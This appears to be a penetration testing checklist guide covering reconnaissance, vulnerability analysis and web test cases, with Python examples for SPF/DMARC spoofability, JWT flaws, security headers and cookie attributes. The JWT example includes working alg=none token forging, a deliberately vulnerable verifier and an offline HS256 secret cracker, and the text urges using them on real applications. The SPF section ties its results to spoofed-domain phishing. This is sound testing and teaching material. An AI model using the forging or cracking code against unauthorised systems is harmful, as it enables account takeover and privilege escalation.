I'm sharing my "MY PENTEST CHECKLIST GUIDE" collection, which offers a wide range of prescriptive checks and an arsenal of tools to consider when planning or conducting a penetration test.
I would like to start off by saying, "Hacking isn't necessarily malicious and offensive, nor is it used for defensive purposes. IT IS A WORD. What that word implies to you may mean something different to another individual. For me, hacking first starts by hacking your mind. Remove doubt and disbelief, and adopt a 'just do it' attitude! POINT!"
MY PENTEST MOTTO: LET THESE QUOTES BE INSIGHTFUL TO YOU!
- "Winning is not a sometime thing; it's an all-time thing. You don't win once in a while, you don't do things right once in a while, you do them right all the time. Winning is a habit. Unfortunately, so is losing." - Vince Lombardi
- "Perception is a reality, only in your mind!" - Unknown
- "I never did give them hell. I just told the truth, and they thought it was hell." - Harry S. Truman
Using technologies for unintended purposes is the true essence of hacking for me. Penetration testing is a skill where you never stop learning and evolving. Reading and researching technology is a vital instrument for success when conducting penetration tests. Several elements to be mindful of during pentesting are methodology, data capture, and reporting. This collection is divided into several sections based on experience and research I have gathered over the years. Consider how some components may be implemented in your CI/CD pipeline for long-term gains; just a thought.
The following are phases of penetration testing:
- Scoping and pre-engagement interaction
- Intelligence gathering or OSINT
- Threat modeling
- Vulnerability analysis
- Exploitation
- Post-exploitation
- Reporting
The following checks belong to the intelligence gathering phase:
|-> Fingerprint technologies
|-> Fingerprint servers / web servers
|-> Fingerprint web framework
|-> Fingerprint web application
|-> Stack trace analysis
|-> Conduct search engine discovery and reconnaissance
|-> Identify multiple versions/channels (web, mobile app, web services)
|-> Crawl web pages for keywords like passwords, tokens, dev environments
|-> Information leakage: leaked IDs, email addresses
|-> Spider / web crawl for hidden content
|-> Seek content files like robots.txt, sitemap.xml, .DS_Store, .js
|-> Identify co-hosted and related applications
|-> Identify application entry points
|-> Directory enumeration / directory indexing
|-> Subdomain enumeration
|-> Identify firewalls and WAFs
OSINT tools to consider:
*Tool usage repositories coming soon! These aren't the only tools to explore, but it's a starting point.
|-> Perimeter and infrastructure
|-> Cloud footprint: ASN, FQDN, DNS, IP address ranges
|-> Check whether ICMP is allowed and whether DNS zone transfers (AXFR) are permitted
|-> Network infrastructure configurations
|-> Domains, subdomains, open ports with Shodan
|-> Port scan all ports, not just the default ranges
|-> Enumerate servers, web servers
|-> Enumerate website ~> Enumerate web frameworks ~> Enumerate web applications
|-> Test SSL/TLS configuration (testssl.sh)
|-> Application admin interfaces
|-> Discovery of hidden resources ~> file content exposure ~> robots.txt, sitemap.xml, .DS_Store
|-> Code analysis ~> view page source code
|-> Stack trace analysis ~> inspect network traffic (browser dev tools or an intercepting proxy)
|-> View GitHub repositories for leaked code, configuration and secrets
|-> Analysis of error codes and error pages
|-> Check DMARC/SPF policies (spoofcheck)
*Tool usage repositories coming soon! These aren't the only tools to explore, but it's a starting point.
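Added example for the "Check DMARC/SPF policies (spoofcheck)" item. This is code written for this guide, not the spoofcheck tool itself, and it runs offline on constructed TXT records for three hypothetical domains (hardened.example, weak.example, missing.example). In an engagement you would feed it the TXT answers for the target domain and for _dmarc.<domain>. The verdict logic is an assumption stated here: a domain is reported spoofable unless DMARC is enforcing (p=reject or p=quarantine at pct=100), because SPF alone only covers the envelope sender and does not protect the header From: that the recipient sees.

```python
import re

# Constructed sample TXT records (not real lookups). The checker takes the
# records as input so it runs offline; swap in real DNS answers in practice.
SAMPLE_RECORDS = {
    "hardened.example": {
        "spf": "v=spf1 ip4:203.0.113.0/24 include:_spf.example.net -all",
        "dmarc": "v=DMARC1; p=reject; rua=mailto:dmarc@hardened.example",
    },
    "weak.example": {
        "spf": "v=spf1 include:_spf.example.net ~all",
        "dmarc": "v=DMARC1; p=none; rua=mailto:dmarc@weak.example",
    },
    "missing.example": {"spf": None, "dmarc": None},
}


def parse_spf(record):
    """Split an SPF record into (mechanisms, qualifier of the 'all' term).

    Each mechanism is (qualifier, text); the qualifier defaults to '+'.
    Returns (None, None) when the record is absent or is not SPF."""
    if not record or not record.lower().startswith("v=spf1"):
        return None, None
    mechanisms, all_qualifier = [], None
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in "+-~?":
            qualifier, term = term[0], term[1:]
        if term.lower() == "all":
            all_qualifier = qualifier
        else:
            mechanisms.append((qualifier, term))
    return mechanisms, all_qualifier


def parse_dmarc(record):
    """Turn 'v=DMARC1; p=reject; ...' into a lower-cased tag dict, or None."""
    if not record or not record.lower().startswith("v=dmarc1"):
        return None
    tags = {}
    for part in record.split(";"):
        key, sep, value = part.partition("=")
        if sep:
            tags[key.strip().lower()] = value.strip()
    return tags


def assess_spoofability(spf_record, dmarc_record):
    """Return (spoofable, findings) for one domain.

    Assumed verdict rule: SPF only covers the envelope sender, so without an
    enforcing DMARC policy a receiver still delivers mail whose header From:
    claims this domain. Enforcing means p=reject/quarantine at pct=100."""
    findings = []
    mechanisms, all_qualifier = parse_spf(spf_record)
    dmarc = parse_dmarc(dmarc_record)

    spf_strong = False
    if mechanisms is None:
        findings.append("no SPF record")
    elif all_qualifier in (None, "+", "?"):
        findings.append("SPF 'all' is %s: envelope-from spoofing passes SPF"
                        % (all_qualifier or "absent"))
    elif all_qualifier == "~":
        findings.append("SPF softfail (~all): spoofed envelope-from is only marked, not rejected")
    else:
        spf_strong = True  # -all

    dmarc_enforcing = False
    if dmarc is None:
        findings.append("no DMARC record")
    else:
        policy = dmarc.get("p", "none").lower()
        pct = int(re.sub(r"\D", "", dmarc.get("pct", "100")) or 0)
        if policy in ("reject", "quarantine") and pct == 100:
            dmarc_enforcing = True
        elif policy in ("reject", "quarantine"):
            findings.append("DMARC p=%s but pct=%d: only part of the mail is enforced" % (policy, pct))
        else:
            findings.append("DMARC p=none: failures are reported, not blocked")

    if spf_strong and not dmarc_enforcing:
        findings.append("SPF -all without enforcing DMARC: header From: can still be spoofed")
    return not dmarc_enforcing, findings


if __name__ == "__main__":
    for domain, recs in SAMPLE_RECORDS.items():
        spoofable, findings = assess_spoofability(recs["spf"], recs["dmarc"])
        print(domain, "SPOOFABLE" if spoofable else "protected", findings)
```

The findings list is what goes into the report; the boolean is what you use to decide whether a phishing pretext that spoofs the client's own domain is viable.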
The following are web application test cases, from vulnerability analysis through exploitation:
- Stack trace analysis
- Default credentials
- Credentials transported over an encrypted channel (look for credentials sent in cleartext)
- Database access
- Broken authentication |-> JSON Web Token (JWT) flaws (alg=none accepted, weak HS256 secrets, key confusion)
- Trace redirects
- Check for old, backup and unreferenced files
- Test for cross-domain policy files (e.g. Flash crossdomain.xml, Silverlight clientaccesspolicy.xml, robots.txt)
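Added example for the "Broken authentication |-> JSON Web Token flaw" item; this is code written for this guide, not from any library or target. It uses only the Python standard library and a constructed weak secret and wordlist. It shows the two things a pentester checks first on a JWT-backed app: whether the verifier trusts the alg field from the untrusted header (the alg=none bypass), and whether a captured token lets you recover a weak HS256 secret offline. The hardened verifier beside it pins the algorithm server-side.

```python
import base64
import hashlib
import hmac
import json

# Constructed secret and wordlist for the demo; nothing here comes from a real target.
WEAK_SECRET = "secret123"
SAMPLE_WORDLIST = ["password", "changeme", "secret", "secret123", "jwtsecret"]


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _hs256(signing_input, secret):
    return hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()


def issue_hs256(payload, secret):
    """Server-side issuance of a normal HS256 token."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    return "%s.%s.%s" % (header, body, b64url_encode(_hs256(header + "." + body, secret)))


def forge_alg_none(payload):
    """Attacker-side: rewrite the header to alg=none and drop the signature."""
    header = b64url_encode(json.dumps({"alg": "none", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    return "%s.%s." % (header, body)


def verify_vulnerable(token, secret):
    """Trusts the algorithm named in the untrusted header: the classic flaw."""
    header_b64, body_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg", "").lower() == "none":
        return json.loads(b64url_decode(body_b64))      # unsigned token accepted
    if hmac.compare_digest(_hs256(header_b64 + "." + body_b64, secret), b64url_decode(sig_b64)):
        return json.loads(b64url_decode(body_b64))
    raise ValueError("bad signature")


def verify_hardened(token, secret, allowed_algs=("HS256",)):
    """Pins the algorithm server-side; the header is data, not policy."""
    header_b64, body_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") not in allowed_algs:
        raise ValueError("algorithm %r not allowed" % header.get("alg"))
    if not hmac.compare_digest(_hs256(header_b64 + "." + body_b64, secret), b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(body_b64))


def crack_hs256_secret(token, wordlist):
    """Offline dictionary attack: any captured token is an oracle for a weak HS256 secret."""
    header_b64, body_b64, sig_b64 = token.split(".")
    signing_input, target = header_b64 + "." + body_b64, b64url_decode(sig_b64)
    for candidate in wordlist:
        if hmac.compare_digest(_hs256(signing_input, candidate), target):
            return candidate
    return None


if __name__ == "__main__":
    real = issue_hs256({"sub": "alice", "role": "user"}, WEAK_SECRET)
    forged = forge_alg_none({"sub": "alice", "role": "admin"})
    print("vulnerable verifier ->", verify_vulnerable(forged, WEAK_SECRET))
    try:
        verify_hardened(forged, WEAK_SECRET)
    except ValueError as e:
        print("hardened verifier ->", e)
    print("recovered secret ->", crack_hs256_secret(real, SAMPLE_WORDLIST))
```

Against a real application you would paste a captured token into crack_hs256_secret with a proper wordlist, and submit the forge_alg_none output (also try "None" and "NONE" in the alg field) to see which verifier the target resembles.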
- Test HTTP security headers (e.g. CSP, X-Frame-Options, HSTS)
- Check which HTTP methods are supported and test for Cross Site Tracing (XST) via TRACE
- Test file extension handling
- Test for non-production data in the live environment, and vice versa
- Check for sensitive data in client-side code (e.g. API keys, credentials)
  |-> Code analysis |-> Code entry points |-> Code injection |-> Stack trace analysis |-> HTTP tampering |-> Cross-Origin Resource Sharing (CORS) misconfiguration
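Added example for the HTTP security header and HTTP method items above; it is code written for this guide, not from any scanner. It audits two constructed responses (a weak one and a hardened one; neither was captured from a real target) plus the Allow: header an OPTIONS request returned. The thresholds (HSTS max-age of at least one year, includeSubDomains present, no 'unsafe-inline'/'unsafe-eval', a frame-ancestors directive or X-Frame-Options, nosniff, Referrer-Policy, no version in Server/X-Powered-By) are the ones this guide treats as baseline.

```python
import re

# Constructed responses (not captured from a real target). Keys are case-insensitive.
WEAK_RESPONSE = {
    "Server": "Apache/2.4.41 (Ubuntu)",
    "Content-Type": "text/html; charset=utf-8",
    "Strict-Transport-Security": "max-age=300",
    "Content-Security-Policy": "default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'",
}
WEAK_ALLOW = "GET, HEAD, POST, OPTIONS, TRACE"

HARDENED_RESPONSE = {
    "Content-Type": "text/html; charset=utf-8",
    "Strict-Transport-Security": "max-age=63072000; includeSubDomains; preload",
    "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'",
    "X-Content-Type-Options": "nosniff",
    "Referrer-Policy": "no-referrer",
}
HARDENED_ALLOW = "GET, HEAD, POST, OPTIONS"

ONE_YEAR = 365 * 24 * 3600


def audit_security_headers(headers):
    """Return a list of findings for one HTTPS response's headers."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = []

    hsts = h.get("strict-transport-security")
    if hsts is None:
        findings.append("missing Strict-Transport-Security")
    else:
        m = re.search(r"max-age=(\d+)", hsts, re.I)
        if not m or int(m.group(1)) < ONE_YEAR:
            findings.append("HSTS max-age below one year")
        if "includesubdomains" not in hsts.lower():
            findings.append("HSTS lacks includeSubDomains")

    csp = h.get("content-security-policy")
    if csp is None:
        findings.append("missing Content-Security-Policy")
    else:
        for bad in ("'unsafe-inline'", "'unsafe-eval'"):
            if bad in csp:
                findings.append("CSP allows %s" % bad)
        if "frame-ancestors" not in csp and "x-frame-options" not in h:
            findings.append("no frame-ancestors / X-Frame-Options: clickjacking possible")

    if h.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("missing X-Content-Type-Options: nosniff")
    if "referrer-policy" not in h:
        findings.append("missing Referrer-Policy")
    for leaky in ("server", "x-powered-by"):
        if re.search(r"\d", h.get(leaky, "")):
            findings.append("%s header leaks a version: %s" % (leaky, h[leaky]))
    return findings


def audit_methods(allow_header):
    """Findings for the Allow: header returned to an OPTIONS request."""
    methods = {m.strip().upper() for m in allow_header.split(",") if m.strip()}
    findings = []
    if "TRACE" in methods:
        findings.append("TRACE enabled: test Cross Site Tracing (XST) for header/cookie echo")
    for risky in ("PUT", "DELETE", "CONNECT"):
        if risky in methods:
            findings.append("%s enabled: verify it is authenticated and intended" % risky)
    return findings


if __name__ == "__main__":
    for label, hdrs, allow in (("weak", WEAK_RESPONSE, WEAK_ALLOW),
                               ("hardened", HARDENED_RESPONSE, HARDENED_ALLOW)):
        print(label, audit_security_headers(hdrs) + audit_methods(allow))
```

Note that Allow: is what the server claims; always confirm by sending the method (a TRACE that echoes your request body and cookies is the actual XST finding).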
- Application admin interface
- Bypassing authentication schema; user testing: |-> User registration process |-> Username enumeration
- Injection |-> HTML smuggling |-> HTML injection |-> CSS injection |-> XPath injection |-> XML injection |-> XXE (XML External Entity) |-> IMAP / SMTP injection |-> LDAP injection
- JavaScript execution
- XSS |-> Reflected |-> Stored |-> DOM-based
- Request forgery |-> Cross-Site Request Forgery (CSRF) |-> Server-Side Request Forgery (SSRF)
- Server-Side Template Injection (SSTI) |-> Remote Code Execution
- DB injections |-> MySQL |-> PostgreSQL |-> Oracle
- Account enumeration or guessable user accounts
- Recover sensitive information
- Brute force attack
- Query injections
- Cookie attributes (Secure, HttpOnly, SameSite, Domain, Path, expiry)
- Session management
- Bypassing session management
- Exposed session variables
- Logout / session termination
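Added example for the cookie attribute and session management items; this is code written for this guide and the Set-Cookie headers it checks are constructed, not captured from any application. It parses each Set-Cookie header and reports the attribute weaknesses a tester looks for: missing Secure or HttpOnly, no SameSite or SameSite=None, a Domain attribute that shares the cookie with every subdomain, a __Host- prefixed cookie that violates the prefix rules (browsers silently drop it), a persistent session cookie, and a value too short to carry real entropy. The 16-character minimum and the name patterns used to spot session cookies are assumptions made for the example.

```python
# Constructed Set-Cookie headers; none were captured from a real application.
SAMPLE_COOKIES = [
    "sessionid=8f3a2c9d1e; Path=/",
    "sid=0a1b2c3d4e5f6a7b8c9d; Domain=example.com; Path=/; Secure; HttpOnly; SameSite=None; Max-Age=31536000",
    "__Host-session=3f9a1c7e5b2d8f0a6c4e; Path=/; Secure; HttpOnly; SameSite=Strict",
    "__Host-csrf=9d8c7b6a5f4e3d2c1b0a; Domain=example.com; Secure; SameSite=Strict",
]

SESSION_NAME_HINTS = ("sess", "sid", "auth", "token")   # assumed heuristic
MIN_VALUE_LEN = 16                                       # assumed entropy floor


def parse_set_cookie(header):
    """Split 'name=value; Attr; Attr=val' into (name, value, {attr_lower: value|True})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, sep, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if sep else True
    return name.strip(), value.strip(), attrs


def audit_set_cookie(header):
    """Return findings for one Set-Cookie header as served over HTTPS."""
    name, value, attrs = parse_set_cookie(header)
    findings = []
    if "secure" not in attrs:
        findings.append("%s: missing Secure (sent over plain HTTP)" % name)
    if "httponly" not in attrs:
        findings.append("%s: missing HttpOnly (readable by script, e.g. via XSS)" % name)
    samesite = attrs.get("samesite")
    if samesite in (None, True):
        findings.append("%s: no SameSite attribute (browser default applies)" % name)
    elif samesite.lower() == "none":
        findings.append("%s: SameSite=None, cookie rides along on cross-site requests" % name)
    if "domain" in attrs:
        findings.append("%s: Domain=%s shares the cookie with all subdomains" % (name, attrs["domain"]))
    if name.startswith("__Host-") and (
            "domain" in attrs or attrs.get("path") != "/" or "secure" not in attrs):
        findings.append("%s: __Host- prefix requirements not met; browsers will drop it" % name)
    if ("expires" in attrs or "max-age" in attrs) and any(h in name.lower() for h in SESSION_NAME_HINTS):
        findings.append("%s: session cookie is persistent (Expires/Max-Age set)" % name)
    if len(value) < MIN_VALUE_LEN:
        findings.append("%s: value is %d chars; check it carries enough entropy" % (name, len(value)))
    return findings


def audit_all(headers):
    """Map cookie name -> findings for a list of Set-Cookie headers."""
    return {parse_set_cookie(h)[0]: audit_set_cookie(h) for h in headers}


if __name__ == "__main__":
    for name, findings in audit_all(SAMPLE_COOKIES).items():
        print(name, findings or "ok")
```

Attribute checks are static; pair them with the dynamic checks in this section (does the session ID change after login, is it invalidated server-side on logout, can a stale token still be replayed).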
- Privilege escalation
- File inclusions |-> RFI |-> LFI
- File upload |-> Upload unexpected file types |-> Upload malicious file types
  |-> Hidden directories
  |-> Sensitive files
- Fuzzing
- Denial of service
These resources have been some of my learning tools; they are the "how" and "why" this guide continues to grow.
- OWASP Testing Guide v4
- Web Application
- Web Security Academy
- OWASP-Testing-Guide-v5